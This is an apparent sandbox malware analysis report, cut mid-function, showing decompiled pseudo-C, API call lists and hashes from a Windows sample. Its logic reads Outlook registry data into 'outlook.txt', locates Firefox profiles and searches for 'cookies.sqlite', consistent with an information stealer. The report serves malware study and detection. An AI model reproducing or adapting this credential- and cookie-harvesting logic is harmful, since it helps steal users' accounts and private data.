                                                                                								if( *((intOrPtr*)(_t46 + 0x14)) >= 0x10) {
                                                                                									_t46 =  *_t46;
                                                                                								}
                                                                                								_push(_t46);
                                                                                								_push(_t62);
                                                                                								_push(_t49);
                                                                                								E0041E879(_t49, _t62, _t66, _t77);
                                                                                								_t68 = _t69 + 0xc;
                                                                                							}
                                                                                							_t66 = _t66 + 0x44;
                                                                                							_t20 = _t67 - 0x50;
                                                                                							 *_t20 =  *(_t67 - 0x50) - 1;
                                                                                							_t78 =  *_t20;
                                                                                						} while ( *_t20 != 0);
                                                                                					}
                                                                                				}
                                                                                				_push(_t49);
                                                                                				E0041EAA2(_t49, _t62, _t65, _t78);
                                                                                				_t33 =  *((intOrPtr*)(_t67 - 0x60));
                                                                                				if( *((intOrPtr*)(_t67 - 0x60)) != 0) {
                                                                                					E00403BE2(_t33,  *((intOrPtr*)(_t67 - 0x5c)));
                                                                                					_push( *((intOrPtr*)(_t67 - 0x60)));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				return E00421A61(_t49, _t62, _t65);
                                                                                			}
















                                                                                0x004035ed
                                                                                0x004035ed
                                                                                0x004035f4
                                                                                0x004035fd
                                                                                0x00403600
                                                                                0x00403605
                                                                                0x00403611
                                                                                0x0040361a
                                                                                0x0040361c
                                                                                0x0040361c
                                                                                0x00403624
                                                                                0x0040362f
                                                                                0x00403632
                                                                                0x00403634
                                                                                0x00403639
                                                                                0x0040363c
                                                                                0x0040363e
                                                                                0x00403644
                                                                                0x00403649
                                                                                0x0040364a
                                                                                0x00403653
                                                                                0x00403655
                                                                                0x00403658
                                                                                0x0040365a
                                                                                0x0040365f
                                                                                0x00403662
                                                                                0x00403662
                                                                                0x00403666
                                                                                0x0040366a
                                                                                0x0040366c
                                                                                0x0040366c
                                                                                0x0040366e
                                                                                0x0040366f
                                                                                0x00403674
                                                                                0x00403675
                                                                                0x0040367d
                                                                                0x0040367f
                                                                                0x00403685
                                                                                0x0040369f
                                                                                0x004036a5
                                                                                0x004036aa
                                                                                0x004036ae
                                                                                0x004036b0
                                                                                0x004036b0
                                                                                0x004036b2
                                                                                0x004036b3
                                                                                0x004036b4
                                                                                0x004036b5
                                                                                0x004036ba
                                                                                0x004036c4
                                                                                0x00403687
                                                                                0x00403687
                                                                                0x0040368a
                                                                                0x0040368e
                                                                                0x00403690
                                                                                0x00403690
                                                                                0x00403692
                                                                                0x00403693
                                                                                0x00403694
                                                                                0x00403695
                                                                                0x0040369a
                                                                                0x0040369a
                                                                                0x004036c9
                                                                                0x004036cc
                                                                                0x004036cc
                                                                                0x004036cc
                                                                                0x004036cc
                                                                                0x0040365f
                                                                                0x00403653
                                                                                0x004036d1
                                                                                0x004036d2
                                                                                0x004036d7
                                                                                0x004036dd
                                                                                0x004036e2
                                                                                0x004036e7
                                                                                0x004036ea
                                                                                0x004036ef
                                                                                0x004036f5

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004035F4
                                                                                  • Part of subcall function 004032BE: __EH_prolog3.LIBCMT ref: 004032DD
                                                                                  • Part of subcall function 004032BE: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,00000038), ref: 0040331B
                                                                                  • Part of subcall function 004032BE: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?,00000038), ref: 0040359F
                                                                                • _fprintf.LIBCMT ref: 0040364A
                                                                                • _fprintf.LIBCMT ref: 00403675
                                                                                • _fprintf.LIBCMT ref: 00403695
                                                                                  • Part of subcall function 00417463: __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                • _fprintf.LIBCMT ref: 004036B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$H_prolog3_$EnumH_prolog3OpenValue
                                                                                • String ID: %s$%s : $files\outlook.txt
                                                                                • API String ID: 712738878-2709736865
                                                                                • Opcode ID: 5748f1a7f4af215cfc2eb253eee005c533de17ad3d26a97a5216e135064a83d9
                                                                                • Instruction ID: 024fc39400cc96a88b513800fc1af541d7739ed78b29ecd8fd2c54f9bc0ac5cf
                                                                                • Opcode Fuzzy Hash: 5748f1a7f4af215cfc2eb253eee005c533de17ad3d26a97a5216e135064a83d9
                                                                                • Instruction Fuzzy Hash: 5931A771900214AFDB24AF96DC46E8E7B7DFF41305F15042BF401BB2D2DABADA408A59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E00413D67(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				intOrPtr _v544;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t17;
                                                                                				int _t34;
                                                                                				void* _t40;
                                                                                				void* _t44;
                                                                                				signed int _t47;
                                                                                
                                                                                				_t45 = __edi;
                                                                                				_t44 = __edx;
                                                                                				_t39 = __ebx;
                                                                                				_t17 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t17 ^ _t47;
                                                                                				_v544 = _a4;
                                                                                				E00427E30( &_v276, 0, 0x104);
                                                                                				E00427E30( &_v540, 0, 0x104);
                                                                                				_t40 = 0x1a;
                                                                                				E00417B4D(_t40);
                                                                                				 *0x44a1b8( &_v276, __edi,  &_v276);
                                                                                				 *0x44a1b8( &_v540,  &_v276);
                                                                                				 *0x44a1b8( &_v540, "..\\profiles.ini");
                                                                                				_t34 = GetFileAttributesA( &_v540);
                                                                                				if(_t34 != 0xffffffff && (_t34 & 0x00000010) == 0) {
                                                                                					if(E00413C5A(__ebx) != 0) {
                                                                                						E00411133(__ebx, 0x43e028,  &_v276, _v544);
                                                                                					}
                                                                                					_t34 = FreeLibrary( *0x44a09c);
                                                                                				}
                                                                                				return E0041DEB4(_t34, _t39, _v8 ^ _t47, _t44, _t45, 0x104);
                                                                                			}














                                                                                0x00413d67
                                                                                0x00413d67
                                                                                0x00413d67
                                                                                0x00413d70
                                                                                0x00413d77
                                                                                0x00413d84
                                                                                0x00413d93
                                                                                0x00413da5
                                                                                0x00413db6
                                                                                0x00413db7
                                                                                0x00413dc4
                                                                                0x00413dd8
                                                                                0x00413dea
                                                                                0x00413df7
                                                                                0x00413e00
                                                                                0x00413e0d
                                                                                0x00413e23
                                                                                0x00413e23
                                                                                0x00413e2e
                                                                                0x00413e2e
                                                                                0x00413e40

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00413D93
                                                                                • _memset.LIBCMT ref: 00413DA5
                                                                                  • Part of subcall function 00417B4D: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00413DBC,014A10F8,00413DBC,?,?,?,?,?,?,?), ref: 00417B63
                                                                                • lstrcat.KERNEL32(?,014A10F8), ref: 00413DC4
                                                                                • lstrcat.KERNEL32(?,?), ref: 00413DD8
                                                                                • lstrcat.KERNEL32(?,..\profiles.ini), ref: 00413DEA
                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413DF7
                                                                                  • Part of subcall function 00413C5A: __wgetenv.LIBCMT ref: 00413C71
                                                                                  • Part of subcall function 00413C5A: LoadLibraryA.KERNEL32(014A10F8,00000104,00413E0B,?,?,?,?,?,?), ref: 00413CAB
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32(00000000), ref: 00413CC7
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413CDA
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413CED
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413D00
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413D13
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413D26
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 00413E2E
                                                                                  • Part of subcall function 00411133: wsprintfA.USER32 ref: 00411167
                                                                                  • Part of subcall function 00411133: FindFirstFileA.KERNEL32(?,?), ref: 0041117E
                                                                                  • Part of subcall function 00411133: StrCmpCA.SHLWAPI(?,00440CA4), ref: 0041119F
                                                                                  • Part of subcall function 00411133: StrCmpCA.SHLWAPI(?,00440CA8), ref: 004111B9
                                                                                  • Part of subcall function 00411133: wsprintfA.USER32 ref: 004111E0
                                                                                  • Part of subcall function 00411133: StrCmpCA.SHLWAPI(?,cookies.sqlite), ref: 004111F5
                                                                                  • Part of subcall function 00411133: FindNextFileA.KERNEL32(?,?), ref: 004112AF
                                                                                  • Part of subcall function 00411133: FindClose.KERNEL32(?), ref: 004112C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$FileFindlstrcat$Library_memsetwsprintf$AttributesCloseFirstFolderFreeLoadNextPath__wgetenv
                                                                                • String ID: ..\profiles.ini
                                                                                • API String ID: 2353499708-121201995
                                                                                • Opcode ID: c5109f79e3b41afc8b4dc26a71616e54ede66ce622f81052e4755de27e6dcddf
                                                                                • Instruction ID: 626b67a89415a511a1e9c1a0841bf52094ca65d6e6912a9e903d9c89db8a5763
                                                                                • Opcode Fuzzy Hash: c5109f79e3b41afc8b4dc26a71616e54ede66ce622f81052e4755de27e6dcddf
                                                                                • Instruction Fuzzy Hash: 14218B75D4021CABCB10DF64EC49FDEB7BCAF19304F0005AAB609E2191DA749BC98F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 35%
                                                                                			E00407FEB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				short _t12;
                                                                                				intOrPtr _t13;
                                                                                				void* _t14;
                                                                                				void* _t24;
                                                                                				void* _t31;
                                                                                				void* _t35;
                                                                                				void* _t36;
                                                                                				void* _t37;
                                                                                				void* _t39;
                                                                                				void* _t42;
                                                                                				void* _t45;
                                                                                				char* _t47;
                                                                                				void* _t48;
                                                                                				void* _t52;
                                                                                
                                                                                				_push(4);
                                                                                				E00421975(E00435D69, __ebx, __edi, __esi);
                                                                                				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
                                                                                				_t50 =  *((intOrPtr*)(_t48 + 0x1c)) - 0x10;
                                                                                				_t12 = 0x2c;
                                                                                				 *((short*)(_t48 - 0x10)) = _t12;
                                                                                				_t13 =  *((intOrPtr*)(_t48 + 8));
                                                                                				if( *((intOrPtr*)(_t48 + 0x1c)) < 0x10) {
                                                                                					_t13 = _t48 + 8;
                                                                                				}
                                                                                				_t14 = E0041F4CD(_t42, _t50, _t13, _t48 - 0x10);
                                                                                				_t45 = 1;
                                                                                				if(_t14 == 0) {
                                                                                					L28:
                                                                                					return E00421A4D(E00402C34(_t48 + 8, 1, 0));
                                                                                				} else {
                                                                                					_t47 = "1";
                                                                                					do {
                                                                                						_t52 = _t45 - 7;
                                                                                						if(_t52 > 0) {
                                                                                							_t31 = _t45 - 8;
                                                                                							__eflags = _t31;
                                                                                							if(_t31 == 0) {
                                                                                								__eflags =  *0x44a1d8(_t14, _t47);
                                                                                								if(__eflags == 0) {
                                                                                									 *0x44a336 = 1;
                                                                                								}
                                                                                							} else {
                                                                                								_t39 = _t31 - 1;
                                                                                								__eflags = _t39;
                                                                                								if(_t39 == 0) {
                                                                                									__eflags =  *0x44a1d8(_t14, _t47);
                                                                                									if(__eflags == 0) {
                                                                                										 *0x44a337 = 1;
                                                                                									}
                                                                                								} else {
                                                                                									__eflags = _t39 - 3;
                                                                                									if(__eflags == 0) {
                                                                                										E0040381A(0x448554, _t14);
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							if(_t52 == 0) {
                                                                                								__eflags =  *0x44a1d8(_t14, _t47);
                                                                                								if(__eflags == 0) {
                                                                                									 *0x44a335 = 1;
                                                                                								}
                                                                                							} else {
                                                                                								_t35 = _t45 - 1;
                                                                                								if(_t35 == 0) {
                                                                                									 *0x4484fc = 1;
                                                                                								} else {
                                                                                									_t36 = _t35 - 1;
                                                                                									if(_t36 == 0) {
                                                                                										__eflags =  *0x44a1d8(_t14, _t47);
                                                                                										if(__eflags == 0) {
                                                                                											 *0x44a330 = 1;
                                                                                										}
                                                                                									} else {
                                                                                										_t37 = _t36 - 1;
                                                                                										if(_t37 == 0) {
                                                                                											__eflags =  *0x44a1d8(_t14, _t47);
                                                                                											if(__eflags == 0) {
                                                                                												 *0x44a331 = 1;
                                                                                											}
                                                                                										} else {
                                                                                											if(_t37 == 1) {
                                                                                												_t24 =  *0x44a1d8(_t14, _t47);
                                                                                												_t57 = _t24;
                                                                                												if(_t24 == 0) {
                                                                                													 *0x44a332 = 1;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t14 = E0041F4CD(_t42, _t57, 0, _t48 - 0x10);
                                                                                						_t45 = _t45 + 1;
                                                                                					} while (_t14 != 0);
                                                                                					goto L28;
                                                                                				}
                                                                                			}

















                                                                                0x00407feb
                                                                                0x00407ff2
                                                                                0x00407ff7
                                                                                0x00407ffb
                                                                                0x00408001
                                                                                0x00408002
                                                                                0x00408006
                                                                                0x00408009
                                                                                0x0040800b
                                                                                0x0040800b
                                                                                0x00408013
                                                                                0x0040801b
                                                                                0x0040801f
                                                                                0x00408105
                                                                                0x00408116
                                                                                0x00408025
                                                                                0x00408025
                                                                                0x0040802a
                                                                                0x0040802a
                                                                                0x0040802d
                                                                                0x004080ad
                                                                                0x004080ad
                                                                                0x004080b0
                                                                                0x004080e4
                                                                                0x004080e6
                                                                                0x004080e8
                                                                                0x004080e8
                                                                                0x004080b2
                                                                                0x004080b2
                                                                                0x004080b2
                                                                                0x004080b3
                                                                                0x004080cf
                                                                                0x004080d1
                                                                                0x004080d3
                                                                                0x004080d3
                                                                                0x004080b5
                                                                                0x004080b5
                                                                                0x004080b8
                                                                                0x004080c0
                                                                                0x004080c0
                                                                                0x004080b8
                                                                                0x004080b3
                                                                                0x0040802f
                                                                                0x0040802f
                                                                                0x0040809e
                                                                                0x004080a0
                                                                                0x004080a2
                                                                                0x004080a2
                                                                                0x00408031
                                                                                0x00408033
                                                                                0x00408034
                                                                                0x0040808d
                                                                                0x00408036
                                                                                0x00408036
                                                                                0x00408037
                                                                                0x00408080
                                                                                0x00408082
                                                                                0x00408084
                                                                                0x00408084
                                                                                0x00408039
                                                                                0x00408039
                                                                                0x0040803a
                                                                                0x00408067
                                                                                0x00408069
                                                                                0x0040806f
                                                                                0x0040806f
                                                                                0x0040803c
                                                                                0x0040803d
                                                                                0x00408045
                                                                                0x0040804b
                                                                                0x0040804d
                                                                                0x00408053
                                                                                0x00408053
                                                                                0x0040804d
                                                                                0x0040803d
                                                                                0x0040803a
                                                                                0x00408037
                                                                                0x00408034
                                                                                0x0040802f
                                                                                0x004080f5
                                                                                0x004080fb
                                                                                0x004080fd
                                                                                0x00000000
                                                                                0x0040802a

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00407FF2
                                                                                • _strtok.LIBCMT ref: 00408013
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C78,00000004,0040B9B4,00000000,?,?,?,?,?,?,?,?,00000013), ref: 00408045
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C78,00000004,0040B9B4,00000000,?,?,?,?,?,?,?,?,00000013), ref: 00408061
                                                                                • _strtok.LIBCMT ref: 004080F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$H_prolog3
                                                                                • String ID:
                                                                                • API String ID: 3733332552-0
                                                                                • Opcode ID: 7fd46a0d1de4fada3cba7fe27e1e72892158378edddce49b161f34bdfdbbb50a
                                                                                • Instruction ID: 3d3425f143a10d73ae9a13560423d5514b7d02cdb3f64c70a79aca0c9b8df96a
                                                                                • Opcode Fuzzy Hash: 7fd46a0d1de4fada3cba7fe27e1e72892158378edddce49b161f34bdfdbbb50a
                                                                                • Instruction Fuzzy Hash: 5731B8342482439AEB249B25DD48F6B3A589B12345F05807FE581F62D2EF7D888CD76F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00412108(void* __ebx, void** __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				CHAR* _t31;
                                                                                				void* _t37;
                                                                                				void* _t42;
                                                                                				void* _t48;
                                                                                				intOrPtr* _t51;
                                                                                				signed int _t57;
                                                                                				long _t74;
                                                                                				void* _t77;
                                                                                
                                                                                				_push(0x5c);
                                                                                				E004219DE(E00435F87, __ebx, __edi, __esi);
                                                                                				_t31 =  *(_t77 + 8);
                                                                                				_t76 = "0123456789ABCDEF";
                                                                                				_t74 = _t77 - 0x24;
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				 *(_t77 - 0x60) = __ecx;
                                                                                				 *(_t77 - 0x68) = _t31;
                                                                                				 *(_t77 - 0x64) =  *(_t77 + 0xc);
                                                                                				asm("movsb");
                                                                                				_t57 = 0;
                                                                                				if(lstrlenA(_t31) > 0) {
                                                                                					_t76 =  *(_t77 - 0x68);
                                                                                					_t37 = E0041FB20(_t77 - 0x24,  *_t76);
                                                                                					if(_t37 != 0) {
                                                                                						_t74 = _t37 - _t77 - 0x24 << 4;
                                                                                						_t42 = E0041FB20(_t77 - 0x24, _t76[1]);
                                                                                						if(_t42 == 0) {
                                                                                							goto L2;
                                                                                						} else {
                                                                                							_t57 =  !(_t42 - _t77 - 0x00000024 + _t74 ^ 0xffffffa3) & 0x000000ff;
                                                                                							_t13 = lstrlenA(_t76) - 1; // -1
                                                                                							_t74 = _t13;
                                                                                							 *( *(_t77 - 0x64)) = _t74;
                                                                                							_t48 = HeapAlloc(GetProcessHeap(), 8, _t74);
                                                                                							 *( *(_t77 - 0x60)) = _t48;
                                                                                							if(_t48 == 0) {
                                                                                								goto L2;
                                                                                							} else {
                                                                                								 *(_t77 - 0x30) =  *(_t77 - 0x30) & 0x00000000;
                                                                                								 *((intOrPtr*)(_t77 - 0x2c)) = 0xf;
                                                                                								 *((char*)(_t77 - 0x40)) = 0;
                                                                                								E0040381A(_t77 - 0x40, _t76);
                                                                                								 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                                                                								_t76 = _t77 - 0x5c;
                                                                                								_t51 = E0040C689(_t77 - 0x40, _t77 - 0x5c, _t77 - 0x40, 2, 0xffffffff);
                                                                                								if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
                                                                                									_t51 =  *_t51;
                                                                                								}
                                                                                								E0041E985( *( *(_t77 - 0x60)), _t74, _t51);
                                                                                								E00402C34(_t77 - 0x5c, 1, 0);
                                                                                								E00402C34(_t77 - 0x40, 1, 0);
                                                                                								goto L8;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						L2:
                                                                                					}
                                                                                				}
                                                                                				return E00421A61(_t57, _t74, _t76);
                                                                                			}











                                                                                0x00412108
                                                                                0x0041210f
                                                                                0x00412114
                                                                                0x00412117
                                                                                0x0041211c
                                                                                0x0041211f
                                                                                0x00412120
                                                                                0x00412121
                                                                                0x00412122
                                                                                0x00412123
                                                                                0x0041212a
                                                                                0x0041212d
                                                                                0x00412130
                                                                                0x00412131
                                                                                0x0041213b
                                                                                0x00412141
                                                                                0x0041214c
                                                                                0x00412155
                                                                                0x00412166
                                                                                0x00412170
                                                                                0x00412179
                                                                                0x00000000
                                                                                0x0041217b
                                                                                0x00412189
                                                                                0x00412195
                                                                                0x00412195
                                                                                0x0041219e
                                                                                0x004121a7
                                                                                0x004121b0
                                                                                0x004121b4
                                                                                0x00000000
                                                                                0x004121b6
                                                                                0x004121b6
                                                                                0x004121be
                                                                                0x004121c5
                                                                                0x004121c9
                                                                                0x004121ce
                                                                                0x004121da
                                                                                0x004121dd
                                                                                0x004121e6
                                                                                0x004121e8
                                                                                0x004121e8
                                                                                0x004121f1
                                                                                0x00412200
                                                                                0x0041220c
                                                                                0x00000000
                                                                                0x0041220c
                                                                                0x004121b4
                                                                                0x00412157
                                                                                0x00412157
                                                                                0x00412157
                                                                                0x00412155
                                                                                0x00412218

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0041210F
                                                                                • lstrlenA.KERNEL32(?,0000005C,00412287,?,?,00000028), ref: 00412133
                                                                                • lstrlenA.KERNEL32(?), ref: 0041218F
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000001), ref: 004121A0
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004121A7
                                                                                • _strcpy_s.LIBCMT ref: 004121F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaplstrlen$AllocH_prolog3_Process_strcpy_s
                                                                                • String ID: 0123456789ABCDEF
                                                                                • API String ID: 2514983032-2554083253
                                                                                • Opcode ID: d43be65713725ad00583aa58a8319f91af52ee4ea9ecb3dc47b07fd51a09d770
                                                                                • Instruction ID: 55460aa40e66c37f53f99abea5bf570abdfc6f0dda536e0858ed6c8013af8748
                                                                                • Opcode Fuzzy Hash: d43be65713725ad00583aa58a8319f91af52ee4ea9ecb3dc47b07fd51a09d770
                                                                                • Instruction Fuzzy Hash: B2319E729003099FEB14DFA4CD55BDE77B8AF0A314F10016AF505FB291DB79AA45CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00417368(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t67;
                                                                                				void* _t68;
                                                                                				signed int _t76;
                                                                                				void* _t91;
                                                                                				intOrPtr _t98;
                                                                                				void* _t101;
                                                                                				signed int _t102;
                                                                                				signed int _t114;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr* _t118;
                                                                                				intOrPtr _t119;
                                                                                				signed int _t120;
                                                                                				intOrPtr* _t121;
                                                                                				intOrPtr _t123;
                                                                                				signed int _t125;
                                                                                				intOrPtr* _t127;
                                                                                				void* _t129;
                                                                                				void* _t130;
                                                                                
                                                                                				_t130 = __eflags;
                                                                                				_t119 = __edx;
                                                                                				_push(0x34);
                                                                                				E004219DE(E00435E94, __ebx, __edi, __esi);
                                                                                				_t123 = 0xf;
                                                                                				 *((intOrPtr*)(_t129 - 4)) = 0;
                                                                                				_t127 = __ecx;
                                                                                				 *(_t129 - 0x34) = 0;
                                                                                				 *((intOrPtr*)(_t129 - 0x40)) = __ecx;
                                                                                				 *((intOrPtr*)(_t129 - 0x18)) = _t123;
                                                                                				 *((intOrPtr*)(_t129 - 0x1c)) = 0;
                                                                                				 *((char*)(_t129 - 0x2c)) = 0;
                                                                                				E00403A16(_t129 - 0x2c, _t130, "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", 0x24);
                                                                                				 *((intOrPtr*)(_t129 - 4)) = 1;
                                                                                				 *((intOrPtr*)(_t127 + 0x14)) = _t123;
                                                                                				 *((intOrPtr*)(_t127 + 0x10)) = 0;
                                                                                				 *_t127 = 0;
                                                                                				 *(_t129 - 0x34) = 1;
                                                                                				Sleep(0x64);
                                                                                				_t67 = E0041F6BE(_t129 - 0x2c, _t119, _t130, 0);
                                                                                				_t124 = _t67;
                                                                                				_t68 = 2;
                                                                                				 *((intOrPtr*)(_t129 - 0x38)) = _t119;
                                                                                				_push(E00417319(_t68, _t130));
                                                                                				E0041F58A(E0041F2F3() * _t67);
                                                                                				 *((intOrPtr*)(_t129 - 0x30)) = 0;
                                                                                				_t131 =  *((intOrPtr*)(_t129 + 8));
                                                                                				if( *((intOrPtr*)(_t129 + 8)) <= 0) {
                                                                                					L14:
                                                                                					E00402C34(_t129 - 0x2c, 1, 0);
                                                                                					return E00421A61(0, _t124, _t127);
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t76 = E0041F59C(_t131);
                                                                                						asm("cdq");
                                                                                						_t114 = 0x24;
                                                                                						_t120 = _t76 % _t114;
                                                                                						if( *((intOrPtr*)(_t129 - 0x1c)) <= _t120) {
                                                                                							break;
                                                                                						}
                                                                                						_t98 =  *((intOrPtr*)(_t129 - 0x2c));
                                                                                						if( *((intOrPtr*)(_t129 - 0x18)) < 0x10) {
                                                                                							_t98 = _t129 - 0x2c;
                                                                                						}
                                                                                						_t117 =  *((intOrPtr*)(_t127 + 0x14));
                                                                                						 *((char*)(_t129 - 0x38)) =  *((intOrPtr*)(_t98 + _t120));
                                                                                						if(_t117 < 0x10) {
                                                                                							_t121 = _t127;
                                                                                						} else {
                                                                                							_t121 =  *_t127;
                                                                                						}
                                                                                						_t101 =  *((intOrPtr*)(_t127 + 0x10)) + _t121;
                                                                                						if(_t117 < 0x10) {
                                                                                							_t118 = _t127;
                                                                                						} else {
                                                                                							_t118 =  *_t127;
                                                                                						}
                                                                                						if(_t101 != 0) {
                                                                                							_t102 = _t101 - _t118;
                                                                                							__eflags = _t102;
                                                                                						} else {
                                                                                							_t102 = 0;
                                                                                						}
                                                                                						_t124 = _t102;
                                                                                						E00418795(_t118, _t102, _t127, _t129, 1,  *((intOrPtr*)(_t129 - 0x38)));
                                                                                						 *((intOrPtr*)(_t129 - 0x30)) =  *((intOrPtr*)(_t129 - 0x30)) + 1;
                                                                                						if( *((intOrPtr*)(_t129 - 0x30)) <  *((intOrPtr*)(_t129 + 8))) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L14;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                					E0041D406("invalid string position");
                                                                                					asm("int3");
                                                                                					_push(0xd8);
                                                                                					E004219DE(E004370C7, 0, _t124, _t127);
                                                                                					_t125 = _t114;
                                                                                					__eflags = 0;
                                                                                					 *((intOrPtr*)(_t129 - 0x30)) = 0;
                                                                                					 *((intOrPtr*)(_t125 + 0x14)) = 0xf;
                                                                                					 *((intOrPtr*)(_t125 + 0x10)) = 0;
                                                                                					 *(_t129 - 0x34) = _t125;
                                                                                					 *_t125 = 0;
                                                                                					 *((intOrPtr*)(_t129 - 0xe0)) = 0x4425c8;
                                                                                					 *((intOrPtr*)(_t129 - 0xd0)) = 0x442704;
                                                                                					 *((intOrPtr*)(_t129 - 0x80)) = 0x441158;
                                                                                					_push(_t129 - 0xc8);
                                                                                					 *((intOrPtr*)(_t129 - 4)) = 1;
                                                                                					_push(_t129 - 0xe0);
                                                                                					 *((intOrPtr*)(_t129 - 0x30)) = 3;
                                                                                					E004169F3(_t127, 0); // executed
                                                                                					 *((intOrPtr*)(_t129 - 4)) = 2;
                                                                                					_t46 =  *((intOrPtr*)(_t129 - 0xe0)) + 4; // 0x60
                                                                                					 *((intOrPtr*)(_t129 +  *_t46 - 0xe0)) = 0x4411fc;
                                                                                					_push(_t129 - 0xc8);
                                                                                					E00414F20(0, _t125, _t127, 0);
                                                                                					 *((intOrPtr*)(_t129 - 0xc8)) = 0x4411bc;
                                                                                					 *((intOrPtr*)(_t129 - 0x8c)) = 0;
                                                                                					 *((intOrPtr*)(_t129 - 0x88)) = 0;
                                                                                					_push( *((intOrPtr*)(_t129 + 8)));
                                                                                					_push(_t129 - 0xd0);
                                                                                					 *((intOrPtr*)(_t129 - 4)) = 4;
                                                                                					E00417DA6(0, _t114, _t125, _t127, 0);
                                                                                					_t91 = E0040C982(_t129 - 0xe0, _t129 - 0x2c);
                                                                                					 *((char*)(_t129 - 4)) = 5;
